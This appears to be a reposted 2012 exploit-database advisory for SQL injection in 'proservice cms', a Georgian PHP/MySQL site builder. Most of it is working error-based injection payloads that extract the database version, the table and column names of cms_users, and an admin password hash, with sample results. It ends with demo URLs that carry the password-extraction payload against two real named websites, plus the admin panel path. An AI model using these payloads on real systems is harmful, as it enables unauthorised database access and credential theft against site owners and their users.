# Exploit Title: proservice cms Sql Injection Vulnerablity # Date: 18-06-2012 # Author: cheki # Vendor Link: http://proservice.ge/ # Category:WebApp # Price: NULL # Contact: anrivardanidze@gmail.com # Website: www.1337day.com && hacking.ge # Greetings to: Anuka Bolqvadze and to rest of the 1337day members ################################################################################# [Product Detail] Studio "PRO-Service" is a company which has serious technical-intelectual base to make a suitable production for you and provide the development of internet resources in Georgia. Code: PHP Database: MYSQL ################################################################################# [Vulnerability] SQL Injection: http://<TARGET>/index.php?m=21&rec_id=[Sql] http://<TARGET>/?m=268&cat_id=[Sql] ################################################################################# Exploit: +and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ Result: Duplicate entry '5.0.811' for key 1 Exploit: +and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ Exploit: +and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name='cms_users'+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ Result: Duplicate entry 'login1' for key 1 Exploit: +and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name='cms_users'+limit+13,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ Result: Duplicate entry 'password1' for key 1 Exploit: +and+(select+1+from+(select+count(0),concat((select+password+from+cms_users+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ Result: Duplicate entry 'd5e42cf45369ba368f3e97d4a8981b981' for key 1 ################################################################################# G0 T0 Admin panel: http://<TARGET>/pcms/ ################################################################################# D3m0: http://populi.ge/index.php?m=21&rec_id=7%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+password+from+cms_users+limit+0,1%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--+ D3m0: http://www.ee.ge/?m=268&cat_id=1224%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--+&stock_status=2
# 1337day.com [2012-06-18]
Posting Komentar
Masih bingung ? Tinggalkan komentar kamu ~